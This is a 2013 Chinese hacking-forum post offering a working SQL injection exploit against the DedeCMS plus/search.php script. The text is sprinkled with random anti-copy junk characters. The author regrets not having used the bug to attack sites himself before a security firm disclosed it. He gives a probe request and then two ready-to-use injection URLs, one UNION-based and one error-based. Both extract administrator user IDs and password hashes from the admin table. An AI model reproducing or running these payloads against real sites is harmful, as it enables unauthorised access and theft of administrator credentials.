找回密码
 立即注册
查看: 2518|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ4 r! X6 {: P4 {

9 ^8 S! A: P' ^( }2 y* D% o哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
! o5 K0 k% g2 n9 K$ ]! v. h) T' s- Y/ V
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
7 k( d! K: y- ^9 g0 N7 R6 [$ y3 \; k/ \7 |: e9 p/ A
我一般是这样测试的:
, L1 X  f! i1 J) }; @% B2 u% U% M/ s2 d6 x0 l" k
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
" P4 p2 v- ~: p3 {
- A* B6 T& s1 d! T' s4 M$ d2 b转载不加作者名的没JJ
2 {2 Z; V/ {5 r+ E! ]
* z' M6 s8 b) V4 B/ h作者:鬼哥
: a+ O, }) Y1 n" _& x* ?0 R* [8 G6 W

; z0 ~6 l, d  E, F& X
/ `0 o1 B+ d: a看结果如果提示
- b: K* |: b! M- L8 y3 A0 P  G" T( U; e7 b% d
Safe Alert: Request Error step 2 !! m7 t! t8 W: F& u, w5 U& }5 E

$ i8 }5 U2 ~1 t  q$ Y! J那么直接用下面的exp- t2 w2 q' r3 r+ {6 `% B7 B( R
2 k; g* d: o6 r. l9 Z# D# L
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a" Q( x) }% a0 D' a& @

: x3 `: C$ j5 ~9 B6 U* h$ @- S) `7 [' G
看结果如果提示  {$ N$ i7 }7 Z

$ Q# ~; X  P  ]Safe Alert: Request Error step 1 !% Z  j# {, i" ?6 a) Q
, p/ v: T. D& C& I
那么直接用下面的exp
2 K, S' z4 l: e* M4 f1 ^: e! s; T9 [  c! @5 B
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
7 l( |" |. L7 f, t' u3 S4 L0 I, d% w8 }) _
$ f  t/ m. f' E" ?2 G
如果正常显示证明漏洞不存在了。8 a2 Z" f4 y  }3 W. j$ }* f

6 R. s  ?) d4 p" _转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表